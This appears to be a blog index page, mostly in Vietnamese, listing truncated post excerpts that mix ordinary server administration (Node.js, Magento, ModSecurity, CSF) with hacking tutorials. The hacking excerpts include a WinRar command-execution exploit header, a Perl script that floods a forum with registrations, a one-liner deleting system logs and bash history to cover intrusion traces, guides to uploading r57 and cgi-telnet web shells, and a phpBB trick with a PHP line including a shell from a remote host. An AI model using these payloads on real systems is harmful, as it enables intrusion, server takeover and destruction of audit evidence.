Install the Distro-Stable Version of Node.js with YUM In order to download this version, we will use the yum package manager. Update your yum packages: sudo yum update Install Node.js: sudo yum install nodejs Verify the current version of Node.js: node –version Install npm (Node Package Manager): sudo yum install npm Install Node.js using NVM Instead of using yum, you can install..
Read more# Triggering the vulnerability # 1) Run this python script. # 2) Open WinRar # 3) Click Options # 4) Click Import/Export # 5) Import Settings from file # 6) Select the Specially crafted Settings.reg file #!/usr/bin/python -w # Title : WinRar Settings Import Command Execution # Date : 02/10/2015 # Author : R-73eN #..
Read moreNgoài phương thức tấn công phổ biến là làm ngập dữ liệu qua hình thức tấn công từ chối dịch vụ (DDoS) thì còn một hình thức khá phổ biến nữa đó là tấn công từ các lỗ hổng bảo mật có trong các mã độc được đính kèm vào theme, plugin hay chính source..
Read moreMagento uses a lot of resources to re-index data from the Admin Panel. A good way to re-index data without using the admin panel is to use command shell “ssh”. This also would work if you happen to be locked out of the admin panel.
Read moreOptimize magento database Log Cleaning Magento maintains several tables for logging. These tables log things such as customer accesses and which products have been compared. Magento has a mechanism for cleaning these logs regularly, but unfortunately this feature is disabled by default and most customers do not turn it on. There are three ways to..
Read more1. giới thiệu về Mod_security ModSecurity là một bộ máy phát hiện và phòng chống xâm nhập dành cho các ứng dụng web (hoặc 1 web application firewall). Hoạt động như một module của máy chủ web Apache, mục đích của ModSecurity là tăng cường bảo mật cho các ứng dụng web, bảo vệ chúng..
Read more#!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts(“h:d:n:u:”); $host = $opt_h; $dir = $opt_d; $n = $opt_n; $u = $opt_u; print “[~] SERVER : $host\r\n”; print “[~] PATH : $dir\r\n”; print “[~] TIMES : $n”; print “\r\n”; print “[~] Attacking… \n”; for($i=1;$i<=$n;$i++) { $h = $i++; $user = $u.$h; $mail = “$user%40stylenet$i.club”; $mail2= $mail; $post1 = “s=&do=register&url=$host$dir&nth=0&day=0&year=0&w..
Read more1. Upload là cái gì chắc ai cũng biết nhỉ, nó là cho phép truyền tải file lên server qua một giao diện tương tác với người sử dụng. 2. Lợi hại gì qua cái upload ?? a. Lợi: tự nghiên cứu nha b. Hại: cho lên con virus hay các loại file nguy hiểm..
Read morerm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history..
Read moreĐiều kiện cần : +Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé ! + Các lệnh để hack : ls -al : lệnh này để xem thông tin cd : lệnh này dùng để chuyển thư mục Cat : lệnh này dùng để xem info..
Read morephpBB version : 2.0.9 chuẩn bị sẵn 1 con shell upload shell txt lên host nào đó chèn đoạn code sau vào notepad roài save với đuôi .gif <php include “http://link…/shell.txt”; ?> khi ta đã vào dc admincp của phpBB chuyển tới config … chọn cho upload avatar = Yes Sau đó backup lại database..
Read morePhần 1: Cơ bản về R57 I. Cơ bản về r57. 1. Các thông tin ta có thể thấy đc qua shell. Đầu tiên khi nhìn vào r57 các bạn sẽ thấy những dòng trên cùng kiểu như thế này: – Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có..
Read more+IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần Emoticons rồi cứ up con shell php lên là được. Tuy nhiên cách này có hạn chế là đối với các ver >=2.1.7 ko làm được bới vì nó check..
Read more
Cài đặt ConfigServer Security & Firewall (CSF) trên CentOS
ConfigServer Security & Firewall (hay CSF) là một firewall rất phổ biến và hiệu quả được sử dụng trên các server Linux hiện nay. Bên cạnh những tính năng cơ bản như một firewall, CSF còn có những chức năng bảo mật nâng cao khác như ngăn chặn flood login, port scans, SYN floods… Chi tiết..
Read more